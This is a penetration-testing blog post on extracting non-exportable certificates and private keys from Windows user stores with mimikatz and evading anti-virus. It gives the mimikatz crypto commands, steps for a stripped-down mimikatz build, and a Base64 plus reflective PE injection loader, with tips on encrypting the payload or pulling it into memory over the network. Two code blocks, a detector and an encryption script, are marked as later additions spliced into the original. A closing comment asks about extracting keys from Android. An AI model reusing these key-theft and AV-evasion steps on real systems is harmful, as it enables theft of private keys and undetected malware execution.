URL: https://insinuator.net/2017/10/extract-non-exportable-certificates-and-evade-anti-virus-with-mimikatz-and-powersploit/
Breaking
October 20, 2017 by Kevin Kelpen


EXTRACT NON-EXPORTABLE CERTIFICATES AND EVADE ANTI-VIRUS WITH MIMIKATZ AND POWERSPLOIT

Some time ago, one of our customers contacted us with a special request. For
some legitimate reason, they needed to centrally collect certain certificates,
including their private keys, which were distributed across many Windows client
systems and stored in the corresponding user stores. Unfortunately (only in
this case; it is actually good from a security perspective), the private keys in
question were marked non-exportable, making a native export in the context of
the user impossible. As if this wasn't enough, the extraction was supposed to
run in the context of the current user (i.e. without administrative privileges)
while not triggering the existing anti-virus solution at all. Also, the
certificates needed to be transferred to some trusted system where they could
not be accessed in an unauthorized way. So let's have a look at how we tackled
these problems:


CERTIFICATE/KEY EXTRACTION WITH MIMIKATZ

While there were other possibilities to investigate, like extracting the
DPAPI-protected certificates directly from the AD and trying to reverse engineer
the encryption process, we decided on an approach with predictable effort:
using mimikatz. Extracting non-exportable certificates from the user store,
including their private keys, is pretty straightforward with mimikatz. You
simply issue the following commands and the PFX files will be exported to the
mimikatz directory:

crypto::capi
crypto::certificates /export /store:MY /systemstore:CURRENT_USER

The first command patches the Windows Crypto API so that non-exportable
certificates can be exported and the second one does the actual export.



STRIPPING FUNCTIONALITIES FROM MIMIKATZ

So we can extract the certificates, which is good. But mimikatz is a pretty
powerful tool and can do a lot more, like extracting NTLM hashes, passwords,
tickets and so on. Certainly, we don't want all these functionalities to be
potentially available on the client systems, especially when we want to evade
AV (but see below on that topic). Conveniently, mimikatz is open source
software, so we can build our own version with all these functionalities
stripped off. Following the build instructions, we need to set up Visual Studio
and import the mimikatz project. In the Solution Explorer view we can safely
exclude all files in the following directories and their subdirectories by
right-clicking the .c/.h files and selecting "Exclude from Project":

mimikatz/modules/dpapi
mimikatz/modules/kerberos
mimikatz/modules/sekurlsa

In the mimikatz/modules subdirectory we can exclude all files except the
following:

kull_m.h
kull_m_crypto.c
kull_m_crypto.h
kull_m_standard.c
kull_m_standard.h

In the mimikatz directory we can exclude all except the following .c/.h files:

crypto
crypto_system
file
kernel
memory
minidump
output
patch
process
registry
registry_structures
service
mimikatz

So that mimikatz still builds without errors, you need to modify mimikatz.h by
removing all unnecessary includes except the following:

#include "globals.h"
#include "modules/kuhl_m_standard.h"
#include "modules/kuhl_m_crypto.h"
#include <io.h>
#include <fcntl.h>

Additionally, mimikatz.c needs to be modified in the following way: remove all
unneeded entries from the const KUHL_M * mimikatz_modules[] array. In our case
it now looks like this:

const KUHL_M * mimikatz_modules[] = {
 &kuhl_m_standard,
 &kuhl_m_crypto,
};

Furthermore, we need to comment out all function calls of excluded modules. In
our case these were the following lines:

kull_m_asn1_init();
kull_m_asn1_term();
status = kuhl_m_kernel_do(full + 1);
status = kuhl_m_rpc_do(full + 1);

Now we can build our own version of mimikatz with all unnecessary
functionalities stripped off. To lock down the functionality further, one could
even modify mimikatz.c so that it directly executes our commands without
exposing all of the crypto and standard commands to the user.

Note that this was done using a mimikatz version pulled from Git at the end of
June 2017. As the source code might have changed since, the process of removing
functionalities might have changed too. However, you can use this as a starting
point to build your own customized version of mimikatz.



ANTI-VIRUS EVASION, THE POWERSHELL WAY

The next requirement was evading the anti-virus engine. As expected, our
modifications alone were not sufficient to bypass the AV. While there are
sophisticated tools for packing and encrypting binaries to evade AV, some
rather simple approaches may do the job just as well. By Base64-encoding our
binary and executing it with Invoke-ReflectivePEInjection we were able to evade
the AV detection. We can convert our binary to Base64 in PowerShell like this:

$file = "<PathToFile>"
$fileBytes = [System.IO.File]::ReadAllBytes($file)
$base64Str = [System.Convert]::ToBase64String($fileBytes)
$base64Str | Out-File -filepath "<outputPath>/out.txt"

Then we need to create a PowerShell script containing our Base64-encoded binary
(in this case, place Invoke-ReflectivePEInjection.ps1 in the same directory):

. .\Invoke-ReflectivePEInjection.ps1
$ExeStr = "<String from out.txt>" 
$ExeBytes = [System.Convert]::FromBase64String($ExeStr)
Invoke-ReflectivePEInjection -PEBytes $ExeBytes -ExeArgs "<Arg1> <Arg2> ..."

If this is not enough to evade the AV, there are more possibilities to do this
in a stealthier way:

 * Additionally encrypt the encoded binary and decrypt it at runtime only
 * Download the binary and Invoke-ReflectivePEInjection (in encrypted form)
   over the network within the PowerShell script and inject everything
   directly in memory
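From the defender's side, the artifact this technique leaves behind (a large Base64 string in a .ps1 that decodes to a PE image) is straightforward to hunt for. The following PowerShell is an added example, not code from the original post or from PowerSploit; it builds a constructed, non-runnable 128-byte blob with only a DOS header and PE signature as test input and reports every Base64 run in a script that decodes to an executable image.

```powershell
# Added example (not from the original post or PowerSploit): flag base64 blobs
# inside a PowerShell script that decode to a PE image, which is what a
# reflectively loaded binary looks like on disk before it is injected.
function Find-EmbeddedPE {
    param(
        [Parameter(Mandatory)][string]$ScriptText,
        [int]$MinBase64Length = 256   # skip short tokens; a real PE encodes to far more
    )
    $findings = @()
    $pattern = '[A-Za-z0-9+/]{' + $MinBase64Length + ',}={0,2}'
    foreach ($m in [regex]::Matches($ScriptText, $pattern)) {
        try { $bytes = [Convert]::FromBase64String($m.Value) } catch { continue }
        # DOS header: 'MZ' at offset 0, e_lfanew (offset of 'PE\0\0') at 0x3C
        if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) { continue }
        $lfanew = [BitConverter]::ToInt32($bytes, 0x3C)
        $hasPeSig = (($lfanew -ge 0x40) -and ($lfanew + 4 -le $bytes.Length) -and
                     ($bytes[$lfanew] -eq 0x50) -and ($bytes[$lfanew + 1] -eq 0x45) -and
                     ($bytes[$lfanew + 2] -eq 0) -and ($bytes[$lfanew + 3] -eq 0))
        $findings += [pscustomobject]@{
            Offset       = $m.Index        # where the blob starts in the script
            DecodedBytes = $bytes.Length
            PeSignature  = $hasPeSig       # $true: DOS header points at a real PE header
        }
    }
    return $findings
}

# Constructed test input: a 128-byte blob carrying only a DOS header and
# 'PE\0\0' at e_lfanew = 0x40. It is not a runnable executable.
$blob = New-Object byte[] 128
$blob[0] = 0x4D; $blob[1] = 0x5A                        # 'MZ'
[BitConverter]::GetBytes([int]0x40).CopyTo($blob, 0x3C) # e_lfanew
$blob[0x40] = 0x50; $blob[0x41] = 0x45                  # 'PE\0\0'
$sample = ". .\Invoke-ReflectivePEInjection.ps1`n" +
          '$ExeStr = "' + [Convert]::ToBase64String($blob) + '"' + "`n" +
          'Invoke-ReflectivePEInjection -PEBytes ([Convert]::FromBase64String($ExeStr))'

Find-EmbeddedPE -ScriptText $sample -MinBase64Length 64 | Format-Table

# Sweeping a script directory (commented out so the example runs offline):
# Get-ChildItem -Recurse -Filter *.ps1 | ForEach-Object {
#     $file = $_.FullName
#     Find-EmbeddedPE -ScriptText (Get-Content $file -Raw) |
#         Add-Member -NotePropertyName File -NotePropertyValue $file -PassThru
# }
```

The PeSignature column separates real embedded images from random Base64 data that merely happens to start with "MZ"; the same check applies to the encrypted variants once the payload is decrypted in a sandbox or from a PowerShell script block log.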


SECURE COLLECTION OF PRIVATE KEYS

To securely collect the certificates, and especially their private keys, from
each client system on a central server, different possibilities come to mind:

 * A network share which is write-only
 * A network-accessible database where users have INSERT rights only
 * Some form of hybrid encryption protecting the keys in transit too

While the first two options would protect the private keys against
unauthorized access, the third one also protects the private keys on the
network while in transit. For this reason, we decided to secure the private key
of each certificate with a strong and unique password and to encrypt this
password with a public key, which in turn was included in the extraction
script. Ultimately, the private key of each certificate is protected with an
individual and strong password in transit and can then be decrypted on some
secure and trusted system with the private key corresponding to the public key
used for the encryption.
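The hybrid scheme described above, as an added PowerShell example that is not the post's own extraction script. It assumes the exported PFX files sit in .\exported and use a known export password (the $exportPassword placeholder), that the collector's RSA public key is available as the certificate file .\collector-public.cer, and a runtime whose RSA implementation supports OAEP with SHA-256 (PowerShell 5.1 on .NET 4.6+ or PowerShell 7).

```powershell
# Added example (not the post's own script): re-protect each exported PFX with a
# fresh random password and encrypt only that password with the collector's RSA
# public key, so the key material is unreadable in transit and on the server.
# Assumptions: PowerShell 5.1 on .NET 4.6+ or PowerShell 7; the collector's
# public key certificate is .\collector-public.cer; the PFX files from the
# extraction step are in .\exported and use the password in $exportPassword.
$exportPassword = '<password-used-by-the-export-step>'   # placeholder

function New-RandomPassword {
    param([int]$Bytes = 32)
    $buf = New-Object byte[] $Bytes
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $rng.GetBytes($buf); $rng.Dispose()
    return [Convert]::ToBase64String($buf)   # 256 bits of entropy, printable
}

function Protect-PfxForCollector {
    param(
        [Parameter(Mandatory)][string]$PfxPath,
        [Parameter(Mandatory)][string]$PfxPassword,
        [Parameter(Mandatory)][string]$CollectorCertPath
    )
    # Load with the Exportable flag so the key can be re-exported under a new password
    $flags = [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::Exportable
    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $PfxPath, $PfxPassword, $flags

    # 1. Re-export certificate and private key under a fresh, unique password
    $newPassword = New-RandomPassword
    $pfxType = [System.Security.Cryptography.X509Certificates.X509ContentType]::Pfx
    [System.IO.File]::WriteAllBytes("$PfxPath.protected", $cert.Export($pfxType, $newPassword))

    # 2. Encrypt the password alone with the collector's public key (RSA-OAEP, SHA-256)
    $collector = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $CollectorCertPath
    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPublicKey($collector)
    $cipher = $rsa.Encrypt([Text.Encoding]::UTF8.GetBytes($newPassword),
                           [System.Security.Cryptography.RSAEncryptionPadding]::OaepSHA256)
    [System.IO.File]::WriteAllBytes("$PfxPath.password.enc", $cipher)

    # The plaintext password is dropped here; only these two files leave the client.
    return [pscustomobject]@{ Pfx = "$PfxPath.protected"; EncryptedPassword = "$PfxPath.password.enc" }
}

$collectorCert = (Resolve-Path .\collector-public.cer).Path
Get-ChildItem .\exported -Filter *.pfx | ForEach-Object {
    Protect-PfxForCollector -PfxPath $_.FullName -PfxPassword $exportPassword -CollectorCertPath $collectorCert
}
```

On the trusted system, the matching private key recovers each password with $rsa.Decrypt($cipher, OaepSHA256), and that string opens the corresponding .protected PFX; the client never holds anything that can decrypt another client's file.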


We hope we could share some new technical details with you!


Cheers,

Kevin



COMMENTS

 1. Nitin says:
    October 11, 2018 at 10:01 pm
    
    How can we do something similar on Android devices, to extract the private
    key/signing keys? Would this work?
    
    Let's say you want to access the corporate Outlook emails on mobile, or
    have an IM like Skype for Business be able to run on your personal mobile?
    Is it possible?

    

Comments are closed.
